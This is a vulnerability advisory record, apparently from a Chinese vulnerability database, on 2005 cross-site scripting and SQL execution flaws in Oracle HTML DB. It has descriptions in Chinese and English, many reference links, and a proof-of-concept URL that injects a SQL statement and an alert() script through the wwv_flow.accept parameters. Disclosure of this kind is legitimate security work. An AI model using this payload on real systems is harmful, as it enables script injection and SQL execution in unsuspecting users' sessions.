https://www.exploit-db.com/exploits/26330
https://cxsecurity.com/issue/WLB-2005100022
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200510-098

Oracle是一款大型的商业数据库系统，OracleHTMLDB是Oracle数据库的快速web应用开发工具。HTMLDB中存在一些跨站脚本漏洞，起因是没有正确的验证用户输入。攻击者可以利用这些漏洞通过向HTMLDB用户发送特制的HTMLDBurl在数据库中执行SQL语句。

source: http://www.securityfocus.com/bid/15031/info
 
Oracle HTML DB is prone to cross-site scripting vulnerabilities.
 
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site.
 
An attacker can leverage these issues to execute SQL statements in the context of an affected user as well.
 
These issues was originally described and addressed in Oracle Critical Patch Update - April 2005, BID 13139 (Oracle Multiple Vulnerabilities). Due to the availability of more information, these issues are being assigned a separate BID. 

http://www.example.com/pls/otn/wwv_flow.accept?p_flow_id=4500&p_flow_step_id=3&p_instance=428576542275032284&p_page_submission_id=3334304&p_request=RUN&p_arg_names=
4407099841&p_t01=KORNBRUST&p_arg_names=998876535505&p_t02=select sysdate||'alert("'||sysdate||'");' from
dual%3B&p_arg_names=57198154917561018&p_t03=&p_arg_names=50923815163860037&p_t04=&p_arg_names=64882231271599126&p_t05=&p_arg_names=57064518975385648&p_t06=&p_arg_name
s=57356416829253124&p_t07=&p_arg_names=30322022623394012&p_t08=&p_arg_names=106590927281022368&p_t09=&p_md5_checksum=

来源:BUGTRAQ
名称:20051007Cross-Site-ScriptingVulnerabilitiesinOracleHTMLDB
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112870398418456&w;=2
来源:XF
名称:oracle-htmldb-xss(22540)
链接:http://xforce.iss.net/xforce/xfdb/22540
来源:BID
名称:15031
链接:http://www.securityfocus.com/bid/15031
来源:MISC
链接:http://www.red-database-security.com/advisory/oracle_htmldb_css.html
来源:MISC
链接:http://www.oracle.com/technology/deploy/security/pdf/cpuapr2005.pdf
来源:SECUNIA
名称:14935
链接:http://secunia.com/advisories/14935/
来源:FULLDISC
名称:20051007Cross-Site-ScriptingVulnerabilitiesinOracleHTMLDB
链接:http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0173.html
来源:OSVDB
名称:20052
链接:http://www.osvdb.org/20052
来源:OSVDB
名称:20051
链接:http://www.osvdb.org/20051
来源:SREASON
名称:62
链接:http://securityreason.com/securityalert/62